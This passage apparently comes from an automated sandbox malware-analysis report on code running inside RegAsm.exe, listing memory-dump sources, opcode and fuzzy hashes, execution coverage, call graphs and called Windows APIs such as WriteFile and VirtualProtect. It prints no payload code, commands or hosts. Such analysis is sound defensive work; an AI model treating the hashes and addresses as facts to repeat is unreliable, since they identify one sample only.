                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 224781268ce0ac69a42e78d92187a687177a5d7ef93da09b71087a17af09de8a
                                  • Instruction ID: 6121906df5a593de0f055d66a74962db305ce09e39cb69cb5cd15db7398c4eed
                                  • Opcode Fuzzy Hash: 224781268ce0ac69a42e78d92187a687177a5d7ef93da09b71087a17af09de8a
                                  • Instruction Fuzzy Hash: 50E0D8B664030067D210DF069C82B63FB98DB80A30F04C45BED085B342D172B514C9E1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfa5041a7053a1361659c44f11a7945f897799de4ee0bc0301fb0c8392aeb613
                                  • Instruction ID: 5dc19ee4f5bf69d44c23ce622274b70b97b38ba21a7d36a4ed187e056e52d0be
                                  • Opcode Fuzzy Hash: bfa5041a7053a1361659c44f11a7945f897799de4ee0bc0301fb0c8392aeb613
                                  • Instruction Fuzzy Hash: BCD05E351582904FCB4287A8E8E14D43FF1D70B13430585C2E088CB663C629486EDB01
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281007578.000000001D892000.00000040.00000001.sdmp, Offset: 1D892000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d892000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5eeeae1eafcf6a213b944843a6d419c36e2714780b5c6b0d922b586f990bb2fd
                                  • Instruction ID: b09f1cd50f7468c534ed209018a85162d929e545a3a0f90f68fd7e1745398484
                                  • Opcode Fuzzy Hash: 5eeeae1eafcf6a213b944843a6d419c36e2714780b5c6b0d922b586f990bb2fd
                                  • Instruction Fuzzy Hash: 10D05E797046818FD306DE18C1E1FA53B94BBA2B14F8644FAA8408B763C768D581D201
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281007578.000000001D892000.00000040.00000001.sdmp, Offset: 1D892000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d892000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a619bc74b573e07939a20703b5affa3cf2bfe0c5ce2154754b216f6a3071df9
                                  • Instruction ID: 21a7371b169ae65a5f5771aaf573f92cba8efbf1d18a66a7c413b1731a6ae8aa
                                  • Opcode Fuzzy Hash: 4a619bc74b573e07939a20703b5affa3cf2bfe0c5ce2154754b216f6a3071df9
                                  • Instruction Fuzzy Hash: 0BD05E356002814BDB05DE08C2D0F6937D8AB80B04F4244E8BC418F772C7B4D9C0D600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7b0935b2cd809d2355d823f910c416ab23e8a565fc341e3121ce4913e234c94
                                  • Instruction ID: b9572b71a987fc13251fcc2864e4b46cdaad1ec785ec42eb9c1296f402a867cc
                                  • Opcode Fuzzy Hash: b7b0935b2cd809d2355d823f910c416ab23e8a565fc341e3121ce4913e234c94
                                  • Instruction Fuzzy Hash: ADC01236B44458C7DF04FBF8F4940DCB374EAC422575108A1D525A3050DF311E548761
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction ID: 1195abe207876bffed4e289598c4e5b6d1567c369a5d1ac1904c74ff3ed85aa0
                                  • Opcode Fuzzy Hash: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction Fuzzy Hash: 19B1DE71700712EFDB18EF28CC91BD6B3A4FF19764F594329ECA997281CB34A8558B90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction ID: 89bf63b71386a0c13ee9f097c18854f359dca22ee47d775ce8180aa88b367736
                                  • Opcode Fuzzy Hash: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction Fuzzy Hash: B8A189B176034A6FFB215E24CD86BDA3767FF16350F604228FE44AB1D1C7B999889740
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadMemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 3389902171-0
                                  • Opcode ID: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction ID: befdae7e1404a489b24c2dccc33b04b1ed18cc20f05700e452267ebb861cf1d6
                                  • Opcode Fuzzy Hash: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction Fuzzy Hash: 1C81B570A143429EDF25DF2888D4755BAD1EF22320F4883ADCDA68B2D6C3718986D722
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction ID: 3e72e0befc3fa6c035dc677bd5b4008645e4fbe1d3e57c9f9ab9bece2274e205
                                  • Opcode Fuzzy Hash: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction Fuzzy Hash: FDE0ED7D3317008FC714DA28C5D4E5573A6AB5A750F254551F9118B661DA34EC44D620
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction ID: d684541be87bc655fadfcc34e009f7789161328f5676fde78bb395d58ecedf95
                                  • Opcode Fuzzy Hash: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction Fuzzy Hash: 63C04CB6650481CFEF59DA09C491B947361B765744BD944D0E046CBA55C318ED41C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction ID: b933d7a8f0b1c7a96fb1429829bcf9fa5e697247fe5bddf5ae2b1ed24a185623
                                  • Opcode Fuzzy Hash: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction Fuzzy Hash: 03B092313106408FCA51CE19C1D0F80B3E0BF00A40B8244A4E00187A51C364E804C900
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction ID: b36b371992250da8c45f1cd1506764a1d816c012ef71655a4cc1844282d2f311
                                  • Opcode Fuzzy Hash: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Execution Graph

                                  Execution Coverage: 27.5%
                                  Dynamic/Decrypted Code Coverage: 100%
                                  Signature Coverage: 0%
                                  Total number of Nodes: 29
                                  Total number of Limit Nodes: 2

                                  Graph

                                  execution_graph 780 8da38e 781 8da3f9 780->781 782 8da3ba FindCloseChangeNotification 780->782 781->782 783 8da3c8 782->783 784 8da4de 787 8da513 WriteFile 784->787 786 8da545 787->786 808 8da35a 809 8da38e FindCloseChangeNotification 808->809 811 8da3c8 809->811 812 8da4aa 813 8da4de WriteFile 812->813 815 8da545 813->815 788 c80070 789 c80087 788->789 791 c800b9 788->791 792 c800c5 791->792 793 c8011a 792->793 796 8da23c 792->796 800 8da25e 792->800 793->789 797 8da25e GetConsoleOutputCP 796->797 799 8da29c 797->799 799->793 801 8da287 GetConsoleOutputCP 800->801 802 8da2b0 800->802 803 8da29c 801->803 802->801 803->793 804 c80006 805 c80070 804->805 806 c80087 805->806 807 c800b9 2 API calls 805->807 807->806

                                  Callgraph

                                  callgraph 0 Function_00C80CC8 38 Function_00C80D19 0->38 1 Function_008DA38E 2 Function_008D2005 3 Function_008DA005 4 Function_00C80AC1 4->0 5 Function_02410648 19 Function_0241066A 5->19 6 Function_008DA407 7 Function_024105CF 8 Function_008D2098 9 Function_02410054 10 Function_008DA09A 11 Function_008D2194 12 Function_008D2310 13 Function_008D2710 14 Function_008DA210 15 Function_008DA02E 16 Function_024105E4 17 Function_00C802EE 18 Function_008DA4AA 20 Function_0241026D 21 Function_008DA120 22 Function_008D23BC 23 Function_008D213C 24 Function_008DA23C 25 Function_02410074 26 Function_008DA43A 27 Function_00C80070 27->16 33 Function_02410606 27->33 51 Function_00C800B9 27->51 55 Function_008D23F4 27->55 60 Function_00C801B7 27->60 28 Function_008D22B4 29 Function_008D2430 30 Function_0241067F 31 Function_02410000 32 Function_008DA148 34 Function_008D2044 35 Function_008DA2C7 36 Function_0241000C 37 Function_00C80006 37->16 37->33 37->51 37->55 37->60 45 Function_00C80D90 38->45 48 Function_00C80DA0 38->48 39 Function_02410710 40 Function_008DA4DE 41 Function_008DA25E 42 Function_008D2458 43 Function_008DA35A 44 Function_00C80710 44->0 45->45 45->48 46 Function_008D20D0 47 Function_008DA2EE 48->45 48->48 49 Function_008D2364 50 Function_008D2264 51->24 51->41 52 Function_008D24FC 53 Function_00C80E3A 54 Function_008DA078 56 Function_008DA1F4 57 Function_008D21F0 58 Function_024105BF 59 Function_008DA172 60->0 60->4 60->16 60->33 60->44 60->60

                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192049ef41716891ee5ec6ef21dfbf92bc100e8bbdfbae5b5c3a6e5ccd56ef4d
                                  • Instruction ID: f2cfa82b540222d47de8c5319bdae6a00531ee0fef71a6315d646c06085e4ba8
                                  • Opcode Fuzzy Hash: 192049ef41716891ee5ec6ef21dfbf92bc100e8bbdfbae5b5c3a6e5ccd56ef4d
                                  • Instruction Fuzzy Hash: A532AC30604245CFDB54EF29C884A6AB7F2FF88308F208968D8569B265EB31DD49CF64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  control_flow_graph 0 8da4aa-8da535 4 8da579-8da57e 0->4 5 8da537-8da557 WriteFile 0->5 4->5 8 8da559-8da576 5->8 9 8da580-8da585 5->9 9->8
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E90,B567927A,00000000,00000000,00000000,00000000), ref: 008DA53D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 76401b1de76ac2389e8d047a23e3ecc27367a508254ec8f5d5227a9aff371911
                                  • Instruction ID: b03b03e27054210f25720645d3922d1e7a10c6f7beb36313182ea09b804c4723
                                  • Opcode Fuzzy Hash: 76401b1de76ac2389e8d047a23e3ecc27367a508254ec8f5d5227a9aff371911
                                  • Instruction Fuzzy Hash: CE2171714093806FDB228B619C84B96BFB8EF46310F1885DBE985DF163D265A509CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Control-flow Graph

                                  control_flow_graph 12 8da35a-8da3b8 14 8da3f9-8da3fe 12->14 15 8da3ba-8da3c2 FindCloseChangeNotification 12->15 14->15 16 8da3c8-8da3da 15->16 18 8da3dc-8da3f8 16->18 19 8da400-8da405 16->19 19->18
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 008DA3C0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 698a75f327fd903e98b75c438996f0037f31ea98c13e7d75477c60c6d9b97987
                                  • Instruction ID: 6ba2ac6043b71c1f9ec053252c0f8803814f368e72a9a38c0df4d5366d7b3b08
                                  • Opcode Fuzzy Hash: 698a75f327fd903e98b75c438996f0037f31ea98c13e7d75477c60c6d9b97987
                                  • Instruction Fuzzy Hash: 80216D715093C09FD7128B25DC95B52BFB4EF06220F0984EBED85CF263C269A949CB62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Control-flow Graph (rendered graph not preserved; first basic block 8da4de-8da535; legend: Executed / Not Executed)
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E90,B567927A,00000000,00000000,00000000,00000000), ref: 008DA53D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: f3f5e25429371fc571e3570dfff8fb4eaa57c29566559e97cdd2f715e627e1ee
                                  • Instruction ID: 0c3e9be645122e38dca27b522358776a243a60ca30bbd44c832dcfe64d845364
                                  • Opcode Fuzzy Hash: f3f5e25429371fc571e3570dfff8fb4eaa57c29566559e97cdd2f715e627e1ee
                                  • Instruction Fuzzy Hash: 19110172500204AFEB21DF91EC84BAAFBA8EF44320F14855AED49DB211C335A504CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Control-flow Graph (rendered graph not preserved; first basic block 8da23c-8da285; legend: Executed / Not Executed)
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 008DA28D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 99b0253377c7314c77779a3004a4fa8f443f56a7638fc1c2d04b028adba33d0c
                                  • Instruction ID: bc774bc77cbff9e3cb1245120ef3638e7fea04a49760e267450696479ad4b548
                                  • Opcode Fuzzy Hash: 99b0253377c7314c77779a3004a4fa8f443f56a7638fc1c2d04b028adba33d0c
                                  • Instruction Fuzzy Hash: 4801D2314093C49FCB118F15DC84B52FFA4EF06320F0980DAED898F262C269A908CB62
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Control-flow Graph (rendered graph not preserved; first basic block 8da38e-8da3b8; legend: Executed / Not Executed)
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 008DA3C0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 89596cc91018a36ff54e4c5d7b32f6c647f98094f9c99c93412d40a63958f285
                                  • Instruction ID: 4ed4f051f969cfd5c54d87d0c75f60eee8e57dffdf541c5418676266b0d3b884
                                  • Opcode Fuzzy Hash: 89596cc91018a36ff54e4c5d7b32f6c647f98094f9c99c93412d40a63958f285
                                  • Instruction Fuzzy Hash: 3501F231A00384DFDB24CF29D889766FBA4EF40320F18C1ABDD09CB302D675E844CA62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Control-flow Graph (rendered graph not preserved; first basic block 8da25e-8da285; legend: Executed / Not Executed)
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 008DA28D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: c872e890cf8a214a88ecda21b570eec1148987085d7e00dd9d8fcc207563ddec
                                  • Instruction ID: 6471203db0ba62b4645fcbdea604fdd5416cde13bfb377ddc9790a376863d3b2
                                  • Opcode Fuzzy Hash: c872e890cf8a214a88ecda21b570eec1148987085d7e00dd9d8fcc207563ddec
                                  • Instruction Fuzzy Hash: 23F0CD315047849FDB10CF46D888762FBA0EF44725F28C19ADE099F716D37AA948CAA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80710-c80776, calls c80cc8; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83620f19c00e376328ce17beaa47ed64918267152cbe62631a14d1b549fa4398
                                  • Instruction ID: 0285b4c4add076a1497b6e076b8262ef0354a8becf812bd3146e28f8cf47df7f
                                  • Opcode Fuzzy Hash: 83620f19c00e376328ce17beaa47ed64918267152cbe62631a14d1b549fa4398
                                  • Instruction Fuzzy Hash: 85028C30B002058FCB55EF68C894A6EB7F2FF88304F258569D45A9B395DB31ED06CBA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c800b9-c8010f, calls 8da23c / 8da25e; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f80fdabb4181396de6820d03e8d413b5a137c37f911173fec7be21215c6fb3d6
                                  • Instruction ID: 5f9c220f802032d657044c014e71186ba03e5a905b4f7d31beafda469b1e9f84
                                  • Opcode Fuzzy Hash: f80fdabb4181396de6820d03e8d413b5a137c37f911173fec7be21215c6fb3d6
                                  • Instruction Fuzzy Hash: 1B211B347012108FCB59AB7CD068A6D3BF2AFD6315B2445B9D016CF7A1DE368D45CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80006-c8006e, calls c800b9 / 8d23f4 / 24105e4 / 2410606 / c801b7; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b745235df4f60f5ce0f33e0b9101a64a429b88569e334ac98e356cdb0614de0f
                                  • Instruction ID: 195a3f82ca238d7f648d6d7e60133cfed9c959d492a035fae3ec96096b524d27
                                  • Opcode Fuzzy Hash: b745235df4f60f5ce0f33e0b9101a64a429b88569e334ac98e356cdb0614de0f
                                  • Instruction Fuzzy Hash: D9112A6950E7C09FE7038B709C60585BFB4AE47211B1A84D7D1C4CF2B3E7694E09C762
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80da0-c80da9, calls c80d90 / c80da0; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5db390a2f0ed7241383f9480fc0878d51a9760d42d5e385ebd7c5d3dfc7afe42
                                  • Instruction ID: 13126c5e661edc8be58ae492799908bff23cc708e929411269869b17292aead2
                                  • Opcode Fuzzy Hash: 5db390a2f0ed7241383f9480fc0878d51a9760d42d5e385ebd7c5d3dfc7afe42
                                  • Instruction Fuzzy Hash: 1001D631B042849FC306ABB8D86459D7FB5EF86210F2444EAD449DB3A1CE749E06C766
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block 24105e4-2410620; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199984482.0000000002410000.00000040.00000040.sdmp, Offset: 02410000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_2410000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 335590b877179abb3989c5ce450191493c582633bebc3daeaf19efaa18920086
                                  • Instruction ID: 00388ced17d09b0de436e06df69fbf1c5f223fa5e7f5a1889df5a08302dfa8fe
                                  • Opcode Fuzzy Hash: 335590b877179abb3989c5ce450191493c582633bebc3daeaf19efaa18920086
                                  • Instruction Fuzzy Hash: 92F0F4B25093846FD7118F16EC40862FFA8EA86630748C09FEC498B612D225B908CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80d19-c80d52, calls c80d90 / c80da0; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71c48e25a056c9d93c3c0f4d70424f1cf3905b9d87bfa4f60ceacd0bb367d830
                                  • Instruction ID: 9d2745fc3c211db241f1d61a21576d45ca4514653cf434bb774eee8abac27c0a
                                  • Opcode Fuzzy Hash: 71c48e25a056c9d93c3c0f4d70424f1cf3905b9d87bfa4f60ceacd0bb367d830
                                  • Instruction Fuzzy Hash: 89F0CD717082605FD70D637DA8645BB6BA6EFCA214B14417AE009CB3A2CCB64C0283A0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80070-c8007e, calls c800b9 / 8d23f4 / 24105e4 / 2410606 / c801b7; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e61152f8dca27da4e02ea12a822dfbfe4fe151054af029ab63c2ed131d448a8
                                  • Instruction ID: 7fa487f9f8a1b0a13427f0851ce9740a904bee78a75acc9fdd6bd19f212c6f04
                                  • Opcode Fuzzy Hash: 2e61152f8dca27da4e02ea12a822dfbfe4fe151054af029ab63c2ed131d448a8
                                  • Instruction Fuzzy Hash: 43E06D36604649EF8B04EFA5E8884DEBBA9FA84221B108066E509C7110EB315A408B84
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block 2410606-2410620; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199984482.0000000002410000.00000040.00000040.sdmp, Offset: 02410000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_2410000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68a03a9f0ea9dadb6e2822fe1b9e01dcf3d50f41dbf9427f94c756260e6003f3
                                  • Instruction ID: 601c37808707a615b27ec1adbc5c5d155153c434355b0a750099350113c955e7
                                  • Opcode Fuzzy Hash: 68a03a9f0ea9dadb6e2822fe1b9e01dcf3d50f41dbf9427f94c756260e6003f3
                                  • Instruction Fuzzy Hash: 47E092B66006048BD650DF0AEC81452FBD4EB84630B48C47FDD0E9BB00D136B504CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph (rendered graph not preserved; first basic block c80cc8-c80ce5, calls c80d19; legend: Executed / Not Executed)
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc226c3708c4d4724ceefb3c52b617caa73507f252b9c83b9ccf106d44aaf0ac
                                  • Instruction ID: a0a21768dd6f10fec28adef09e1e047a8a3119ad210f64f51f661758dc744cc6
                                  • Opcode Fuzzy Hash: dc226c3708c4d4724ceefb3c52b617caa73507f252b9c83b9ccf106d44aaf0ac
                                  • Instruction Fuzzy Hash: 0CF0EC316091C08FD351EB78E458B917FE55F86224F1540DBD445CB117C7245D48CB41
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a34cab1c1c4660a707e91a6b413b9d1a1762683b960f38f859912678bd53e8f8
                                  • Instruction ID: 2f54e1b59e5c66fcd9036940f684ae1eb08b82247cb90d0312562e773daa53cf
                                  • Opcode Fuzzy Hash: a34cab1c1c4660a707e91a6b413b9d1a1762683b960f38f859912678bd53e8f8
                                  • Instruction Fuzzy Hash: B0D05E316081A08FC7125BB868680F97FB49E0B21175801D2D888CB1A1D6104F2A83A1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
